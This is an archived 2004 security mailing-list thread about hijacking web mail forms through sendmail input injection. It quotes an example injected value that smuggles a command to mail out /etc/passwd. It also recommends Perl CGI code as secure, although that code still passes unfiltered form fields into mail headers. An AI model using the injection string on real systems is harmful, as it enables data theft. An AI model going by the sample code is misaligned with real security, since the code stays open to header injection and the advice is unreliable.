RE: Secure Form Script?

From: Runion Mark A FGA DOIM WEBMASTER(ctr) (mark.runion_at_us.army.mil)
Date: 05/14/04

  • Next message: Stephen Samuel: "Re: Secure Form Script?" 
    To: focus-linux@securityfocus.com
Date: Fri, 14 May 2004 18:58:24 -0000

    Because when they hijack the input to a sendmail command you generally see
    something like this:
    exec '$ sendmail $string';
    And when the actual string looks something like:
    exec '$ sendmail | sendmail -f /etc/passwd to@me.com';

    If you setup a program to vet the input or use a secured shell to operate
    your mail program this can be ignored. Meaning compile your own without the
    snazzy pipes, stops, or other functions one typically finds in all the
    shells. For example instead of using direct executes, just send the email.
    Try something like this instead:

    sub sendmail {
       local $mailto = shift @_;
       local $mailprog = "/usr/bin/mailx";
       local $mailfrom = "Your program";

       # Open The Mail Program
       open(MAIL,"|$mailprog -t") || die "Content-type: text/html\n\nSENDMAIL
    ERROR: Please contact the <a href=\"mailto:$webmaster\">You</a>.";

       print MAIL "From: Your site\n";
       print MAIL "To: $mailto\n";
       print MAIL "Subject: Your subject $Form{subject},";
       print MAIL " $Form{first_name}\n\n";
       print MAIL
    "---------------------------------------------------------------------\n";
       print MAIL "FIRSTN: $Form{first_name}\n";
       print MAIL "Systems List: $Form{system_list}\n\n";

       close MAIL;
       return 0;
    }

    If the incoming data is highly suspicious try something like:
    $Form{$value} =~ s/\|//g;

    So in a parsing function you might do this:
    sub parse_form {
      # Hash form of data is good
      local $buffer = "";
        
      # Get the input
      read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
        
      # Split the name-value pairs
      @pairs = split(/&/, $buffer);
        
      foreach $pair (@pairs) {
        local($name, $value) = split(/=/, $pair);
        # Gets rid of any "junk"
        $name =~ tr/+/ /;
        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $value =~ s/<!--(.|\n)*-->//g; # Clean it up... This is the same
        
        # Associates a name with a value
        if ($value ne '') {
             $Form{$name} = $value;
        }
      }
    }
    -
    Mark Runion

    /*
    "So far beyond cutting edge the blade is null event horizon."
    */
     

    -----Original Message-----
    From: Stephen Samuel [mailto:samuel@bcgreen.com]
    Sent: Thursday, May 13, 2004 1:56 PM
    To: Michael Rice; focus-linux@securityfocus.com
    Subject: Re: Secure Form Script?

    Why not just a form that accepts a subject, a sender email
    and a text message, then mails that to a specific user.
    Even if manage to hijack the fields due to improperly vetted
    input, you'd still only end up with the input going to one
    possible person (the recipient is specified on the (fixed))
    sendmail commandline).

    Michael Rice wrote:
    >>Can someone point me to a discussion about the issues involved with
    >>hijacking web forms? In the applications I write, the destination address

    >>is usually stored on the server, either in the script itself, or in a
    >>configuration file, or in a database. I don't see how someone could use
    >>such a script to change the destination address and point it at a list
    >>of addresses belonging to spam victims.
    >
    >
    > It's usually not sufficient to store the to addresses on the server
    > and/or obfuscate the parameters used for the other input fields.
    >
    >
    > Consider a form that constructs the email like:
    >
    > Date: $local->date
    > From: $form->from
    > To: $local->to
    > Subject: $form->subject
    >
    > $form->body
    >
    > So, to hijack this form, I would construct a subject like: 

    -- 
Stephen Samuel +1(604)876-0426                samuel@bcgreen.com
		   http://www.bcgreen.com/~samuel/
    Powerful committed communication. Transformation touching
      the jewel within each person and bringing it to light.
  • Next message: Stephen Samuel: "Re: Secure Form Script?"
    • Quantcast